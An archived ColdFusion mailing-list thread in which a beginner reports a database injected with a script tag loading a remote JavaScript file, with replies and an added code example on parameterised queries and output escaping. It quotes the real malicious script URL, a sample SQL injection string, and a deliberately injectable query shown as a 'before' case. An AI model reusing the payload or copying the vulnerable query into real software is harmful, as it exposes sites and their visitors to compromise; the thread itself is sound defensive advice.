It appears we've been attacked by this last night / this morning too.

Will update here with more info when we have it.

Dominic

2008/8/7 Mike Kear <[EMAIL PROTECTED]>:
> There are a number of things you can do, and in fact I use all of these -
>
> [A] Find out this person's IP address, and if the form is submitted
> from that IP address, do nothing.  Don't give them any kind of
> feedback at all.    That'll stop this current attack, but since these
> idiots usually dart from one IP address to another, it's not enough to
> fix the problem.  It only stops today's.  You can find out the IP address
> by having your form submit #cgi.remote_addr# in a hidden field.
>
> [B]  Pass the form's submitted contents through a regex to eliminate
> any HTML.  You can get all kinds of string manipulation scripts
> through the library at cflib.org, including one to strip out any HTML.
>
> [C]  Use cfformprotect, which (amongst other things) compares the
> submission in this form with a database of other form submissions from
> other sites, and identifies which ones are spam and which aren't.
> When it tells you this is spam, you just throw it away.   Don't tell
> the spammer you're throwing it away, because that only helps them
> refine their techniques.   Those buggers are agile enough as it is
> without us giving them a helping hand.
>
> You can get cfformprotect from http://www.riaforge.org/ .
>
> [D]  While you're working in this area, you should make sure you're
> using <cfqueryparam> if you're processing the form into your database.
> I know you haven't described a SQL injection, but it's not a million
> miles away from what you do describe.   There's ample documentation in
> the ColdFusion docs about <cfqueryparam>, and there have been quite a
> few blog articles about it lately.   Google for cfqueryparam and
> ColdFusion and you'll find them.  Use <cfqueryparam> on every (and I
> do mean EVERY) parameter you insert into the database, on every insert
> or update, if there is likely to be any user input going in that SQL
> statement.    That ensures that you won't get anyone able to enter a
> last name as 'Smith)';drop table users' or some such.
>
> I started defending my sites from this kind of script when I had a
> guestbook on a very low-volume site suddenly get 30,000 entries waiting for
> editor approval, all with links to sites we might want to go and see,
> just like yours has.  Using the techniques I described reduced the
> flow from thousands a day to a more likely 3-4 a week on this little
> site.
>
> Hope this helps.
>
>
> Cheers
> Mike Kear
> Windsor, NSW, Australia
> Adobe Certified Advanced ColdFusion Developer
> AFP Webworks
> http://afpwebworks.com
> ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
>
>
> On Thu, Aug 7, 2008 at 4:04 PM, Michael Suwanto
> <[EMAIL PROTECTED]> wrote:
>> I'm a ColdFusion noob and my database just got injected with some script.
>> So for example one of the database fields would appear something like so:
>> Gisella427.jpg"></title><script src="http://jjmaoduo.3322.org/csrss/w.js";></script><!--
>>
>> I've tried updating the records using a replace command on the fields, but
>> 20 mins later this code pops up again!!!
>>
>> Any idea on how to fix or prevent this from happening?
>> Seriously out of ideas here....
>>
>
> 

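The pattern Mike describes in point [D], written out as an added example for this thread (it is not code from Mike, Michael, or cfformprotect). It assumes a datasource named myDSN, a table photos with columns id (integer) and filename (varchar(255)), a form field form.filename, and a URL parameter url.id; all of those names are made up for the illustration. The first query is the shape that lets a stored script keep coming back after a clean-up; the second binds every user-controlled value as data; the third escapes on output so anything injected before the fix cannot run in the browser while you clean the rows.

```cfml
<!---
  Added example, not from the original thread.
  Assumed names: datasource myDSN, table photos (id integer, filename varchar(255)),
  form.filename and url.id as the user-controlled inputs.
--->

<!--- BEFORE: the form and URL values are dropped straight into the SQL text.
      A filename such as
        x"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--
      is stored as-is, and an id that carries a trailing ;<second statement>
      is executed as SQL rather than treated as a number.  Re-running the
      attack after a REPLACE clean-up puts the script straight back. --->
<cfquery name="saveVulnerable" datasource="myDSN">
    UPDATE photos
    SET    filename = '#form.filename#'
    WHERE  id = #url.id#
</cfquery>

<!--- AFTER: every user-controlled value goes through cfqueryparam.
      The value is sent to the driver as a bound parameter and is never parsed
      as part of the statement.  cfsqltype="cf_sql_integer" makes ColdFusion
      reject a non-numeric id before the query runs, and maxlength rejects a
      filename longer than the column, so the payload above cannot be stored
      through this query at all. --->
<cfquery name="saveSafe" datasource="myDSN">
    UPDATE photos
    SET    filename = <cfqueryparam value="#form.filename#"
                                    cfsqltype="cf_sql_varchar"
                                    maxlength="255">
    WHERE  id = <cfqueryparam value="#url.id#"
                              cfsqltype="cf_sql_integer">
</cfquery>

<!--- Output side: HTMLEditFormat() (available in ColdFusion 8) turns
      <, >, " and & into entities, so a filename that was injected before
      the fix renders as literal text instead of closing the attribute and
      loading the remote script. --->
<cfquery name="getPhoto" datasource="myDSN">
    SELECT filename
    FROM   photos
    WHERE  id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
</cfquery>
<cfoutput query="getPhoto">
    <img src="/images/#HTMLEditFormat(filename)#" alt="">
</cfoutput>
```

Two practical notes. First, the cfqueryparam change has to be applied to every cfquery that sees user input, including lookups and deletes, not only the form handler that was noticed; the attack that re-injects the rows is usually hitting a different page from the one displaying them. Second, a REPLACE-based clean-up of the affected columns only sticks once the injectable queries are fixed, which is why Michael's replace kept being undone twenty minutes later.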
Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310332